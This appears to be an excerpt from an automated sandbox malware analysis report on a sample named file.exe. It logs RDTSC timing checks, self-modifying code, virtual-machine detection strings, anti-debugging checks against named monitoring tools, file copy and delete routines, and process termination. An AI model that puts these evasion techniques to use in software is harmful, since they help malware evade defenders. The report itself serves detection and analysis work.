                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691AFC second address: 691B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691B01 second address: 691B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691DEF second address: 691DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691DF4 second address: 691E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FB418E8532Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691E07 second address: 691E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691E0B second address: 691E15 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB418E85316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF1E5 second address: 5EF1FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Ah 0x00000007 jmp 00007FB418C0B12Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF1FD second address: 5EF209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB418E85316h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF209 second address: 5EF20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF20D second address: 5EF235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85321h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FB418E8531Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6951B9 second address: 6951C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB418C0B126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6951C3 second address: 6951DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FB418E85316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6951DA second address: 6951E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6951E0 second address: 6951E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69592C second address: 695934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695934 second address: 695938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695938 second address: 695942 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB418C0B126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695B8D second address: 695B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695B9F second address: 695BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69ABCF second address: 69ABDD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69ABDD second address: 69ABF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B131h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0D9C second address: 6A0DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0DA4 second address: 6A0DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jng 00007FB418C0B126h 0x0000000c jc 00007FB418C0B126h 0x00000012 pop ecx 0x00000013 jng 00007FB418C0B12Ch 0x00000019 jnp 00007FB418C0B126h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0DC6 second address: 6A0E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB418E85316h 0x0000000a jnl 00007FB418E85316h 0x00000010 jmp 00007FB418E85323h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 jne 00007FB418E85316h 0x0000001f pushad 0x00000020 popad 0x00000021 push edi 0x00000022 pop edi 0x00000023 push eax 0x00000024 pop eax 0x00000025 popad 0x00000026 jnc 00007FB418E8531Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A126C second address: 6A1276 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB418C0B13Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A152A second address: 6A152E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A152E second address: 6A153E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB418C0B126h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A153E second address: 6A1542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A291E second address: 6A2925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A2925 second address: 6A292B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A292B second address: 6A292F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A292F second address: 6A293B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A07C4 second address: 6A0811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB418C0B126h 0x0000000a jnc 00007FB418C0B126h 0x00000010 jnp 00007FB418C0B126h 0x00000016 popad 0x00000017 push eax 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007FB418C0B141h 0x00000024 push eax 0x00000025 push edx 0x00000026 je 00007FB418C0B126h 0x0000002c jc 00007FB418C0B126h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0811 second address: 6A0825 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6959 second address: 6A6968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007FB418C0B126h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6968 second address: 6A699A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85327h 0x00000007 jmp 00007FB418E85327h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB166 second address: 6AB16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB16E second address: 6AB174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB424 second address: 6AB442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B138h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D0C second address: 6B8D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FB418E8531Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D1E second address: 6B8D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B131h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FB418C0B12Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D3F second address: 6B8D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FB418E8531Ch 0x0000000d jnc 00007FB418E85318h 0x00000013 push edx 0x00000014 jnp 00007FB418E85316h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F413B second address: 5F413F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F413F second address: 5F415F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB418E85320h 0x0000000b pop ebx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB418E85316h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8834 second address: 6B883A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B883A second address: 6B8851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB418E85316h 0x0000000a jmp 00007FB418E8531Ch 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8851 second address: 6B8857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8857 second address: 6B886E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB418E85316h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007FB418E85316h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B886E second address: 6B8880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB418C0B126h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8880 second address: 6B8885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8885 second address: 6B888B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B888B second address: 6B888F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B888F second address: 6B8895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BBCFD second address: 6BBD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85328h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BBD19 second address: 6BBD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB88C second address: 6BB8A4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418E8531Eh 0x00000008 jng 00007FB418E85322h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3579 second address: 5E358A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB418C0B12Ch 0x00000008 jns 00007FB418C0B126h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E358A second address: 5E3594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3594 second address: 5E35B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB418C0B138h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E35B6 second address: 5E35DC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418E85316h 0x00000008 jmp 00007FB418E85329h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C6CAF second address: 6C6CB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE4F1 second address: 6CE50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85324h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5592 second address: 6D5596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5596 second address: 6D55BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FB418E8531Eh 0x0000000e js 00007FB418E85316h 0x00000014 pushad 0x00000015 popad 0x00000016 jbe 00007FB418E8531Ch 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D67DF second address: 6D67E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA646 second address: 6DA64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8D8E second address: 6F8D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8D93 second address: 6F8DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E8531Ch 0x00000009 jmp 00007FB418E85321h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 47DC34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 47DD13 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 62576B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 623E10 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 47B2C2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 64AF17 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 62FC45 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision | graph_0-38940
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_001A40F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0019E530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00191710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00191710
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0019F7B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_001A47C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_001A3B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001A4B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0019DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0019EE20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0019BE40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0019DF10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00191160 GetSystemInfo,ExitProcess | 0_2_00191160
Source: file.exe, file.exe, 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2062308102.0000000000E52000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2062308102.0000000000E85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-37767
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-37755
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-37752
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-37807
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-37775
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-37640
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00194610 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00194610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_001A9BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A9AA0 mov eax, dword ptr fs:[00000030h] | 0_2_001A9AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA | 0_2_001A7690
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 1360, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_001A9790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle | 0_2_001A98E0
Source: file.exe, file.exe, 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D7588 cpuid | 0_2_001D7588
